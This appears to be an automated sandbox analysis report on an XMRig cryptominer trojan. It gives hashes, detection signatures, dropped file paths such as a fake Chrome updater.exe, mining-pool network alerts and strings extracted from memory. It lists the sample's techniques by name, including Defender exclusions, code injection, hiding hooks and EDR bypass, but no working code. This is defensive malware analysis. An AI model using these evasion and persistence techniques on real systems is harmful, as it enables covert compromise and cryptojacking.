Windows Analysis Report
ylVAEHbMLf.exe

Overview

General Information

Sample name:	ylVAEHbMLf.exe renamed because original name is a hash value
Original sample name:	3fb477ee2214bf2d4ed7df2d23f159e8.exe
Analysis ID:	1528506
MD5:	3fb477ee2214bf2d4ed7df2d23f159e8
SHA1:	836c3f3b4b8f02e495703767b6bf923c453dba36
SHA256:	508821549db3334cccd6d492e17b29343ea5d0bda03379188c083e8c2217c291
Tags:	64exetrojan
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs new ROOT certificates

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Protects its processes via BreakOnTermination flag

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious powershell command line found

Writes to foreign memory regions

Yara detected PersistenceViaHiddenTask

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ylVAEHbMLf.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp	Avira: detection malicious, Label: HEUR/AGEN.1362356
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Avira: detection malicious, Label: HEUR/AGEN.1329646

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: ylVAEHbMLf.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ylVAEHbMLf.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY

Source: ylVAEHbMLf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64BE3C FindFirstFileExW,	7_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6ABE3C FindFirstFileExW,	7_2_00000225DC6ABE3C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEBE3C FindFirstFileExW,	8_2_00000202C0AEBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130BE3C FindFirstFileExW,	9_2_000002A66130BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29BE3C FindFirstFileExW,	10_2_000002BAAE29BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CBE3C FindFirstFileExW,	11_2_0000026A879CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537ABE3C FindFirstFileExW,	12_2_00000179537ABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4BE3C FindFirstFileExW,	12_2_0000017953D4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56BE3C FindFirstFileExW,	13_2_000002295D56BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6BE3C FindFirstFileExW,	14_2_0000025306E6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BBE3C FindFirstFileExW,	15_2_000001845B3BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4BE3C FindFirstFileExW,	16_2_000001ADECD4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907BE3C FindFirstFileExW,	17_2_000001D55907BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EABE3C FindFirstFileExW,	18_2_00000241A9EABE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EBE3C FindFirstFileExW,	21_2_000002152C3EBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319BE3C FindFirstFileExW,	24_2_000001CD7319BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89BE3C FindFirstFileExW,	26_2_000002824E89BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FBE3C FindFirstFileExW,	26_2_000002824E8FBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3BE3C FindFirstFileExW,	27_2_0000021B47B3BE3C

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:51734 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49736 -> 45.76.89.70:80

Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000005.00000002.1819640714.000001FA482FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000008.00000002.2986292449.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000008.00000000.1747836677.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2992018562.00000202C0200000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000008.00000000.1747558953.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C03B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.
Source: lsass.exe, 00000008.00000002.2992018562.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747836677.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000012.00000002.2989122565.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747440586.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2983352269.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000008.00000000.1747384968.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.2982379395.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000008.00000000.1748331795.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
